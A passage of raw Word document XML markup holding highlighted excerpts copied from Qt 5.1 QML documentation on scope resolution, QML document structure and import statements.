          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId352" w:history="1">
        <w:r w:rsidRPr="00E21B6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Network Transparency</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>documentation for more information about network transparency in imports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="007022E0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="435" w:name="scope-and-naming-resolution"/>
      <w:bookmarkStart w:id="436" w:name="_Toc483000624"/>
      <w:bookmarkStart w:id="437" w:name="_Toc483003641"/>
      <w:bookmarkStart w:id="438" w:name="_Toc483603977"/>
      <w:bookmarkStart w:id="439" w:name="_Toc483605197"/>
      <w:bookmarkEnd w:id="435"/>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scope and Naming Resolution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="436"/>
      <w:bookmarkEnd w:id="437"/>
      <w:bookmarkEnd w:id="438"/>
      <w:bookmarkEnd w:id="439"/>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00E21B6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in documents usually </w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>involve objects or properties of objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and since multiple objects may be defined and since different objects may have properties with the same name, some </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">predefined symbol resolution </w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>semantics must be defined by QML</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Please see the page on</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId353" w:history="1">
        <w:r w:rsidRPr="00E21B6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>scope and symbol resolution</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for in-depth information about the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00B31BD5" w:rsidRDefault="00490E7E" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId354" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00B31BD5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtqml/qtqml-documents-structure.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="007022E0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="440" w:name="_Toc483000625"/>
      <w:bookmarkStart w:id="441" w:name="_Toc483003642"/>
      <w:bookmarkStart w:id="442" w:name="_Toc483603978"/>
      <w:bookmarkStart w:id="443" w:name="_Toc483605198"/>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Structure of a QML Document</w:t>
      </w:r>
      <w:bookmarkEnd w:id="440"/>
      <w:bookmarkEnd w:id="441"/>
      <w:bookmarkEnd w:id="442"/>
      <w:bookmarkEnd w:id="443"/>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="00B31BD5">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A07A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A QML document is a self contained piece of QML source code</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that consists of two parts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Its</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A07A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="005A07A7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A07A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>statements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="005A07A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>single root object declaration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="00B31BD5">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">By </w:t>
      </w:r>
      <w:r w:rsidRPr="005A07A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>convention</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>single empty line separates the imports</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the object hierarchy definition.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="00B31BD5">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">QML documents are always encoded in </w:t>
      </w:r>
      <w:r w:rsidRPr="005A07A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UTF-8 format</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="007022E0">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="444" w:name="imports"/>
      <w:bookmarkStart w:id="445" w:name="_Toc483000626"/>
      <w:bookmarkStart w:id="446" w:name="_Toc483003643"/>
      <w:bookmarkStart w:id="447" w:name="_Toc483603979"/>
      <w:bookmarkStart w:id="448" w:name="_Toc483605199"/>
      <w:bookmarkEnd w:id="444"/>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Imports</w:t>
      </w:r>
      <w:bookmarkEnd w:id="445"/>
      <w:bookmarkEnd w:id="446"/>
      <w:bookmarkEnd w:id="447"/>
      <w:bookmarkEnd w:id="448"/>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="00B31BD5">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="005A07A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document must import</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the necessary modules or type namespaces to enable the engine to load the QML object types referenced within the document. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A07A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By default, a document can access</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> any QML object types that have been defined through</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">files in </w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the same directory</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; if a document needs to refer to any other object types, it must import the type namespace into which those types have been registered.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A07A7" w:rsidRPr="005A07A7" w:rsidRDefault="00B31BD5" w:rsidP="00B31BD5">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A07A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML does</w:t>
      </w:r>
      <w:r w:rsidRPr="005A07A7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A07A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="005A07A7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A07A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">have a </w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>preprocessor that modifies the document prior to presentation to the</w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId355" w:history="1">
        <w:r w:rsidRPr="007022E0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML engine</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, unlike C or C++. The</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">statements do not copy and prepend the code in the document, but instead instruct the QML engine on how to resolve type references found in the document. </w:t>
      </w:r>
      <w:r w:rsidR="005A07A7" w:rsidRPr="005A07A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Import section realization</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B31BD5" w:rsidRPr="00B31BD5" w:rsidRDefault="00B31BD5" w:rsidP="00B31BD5">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007022E0">
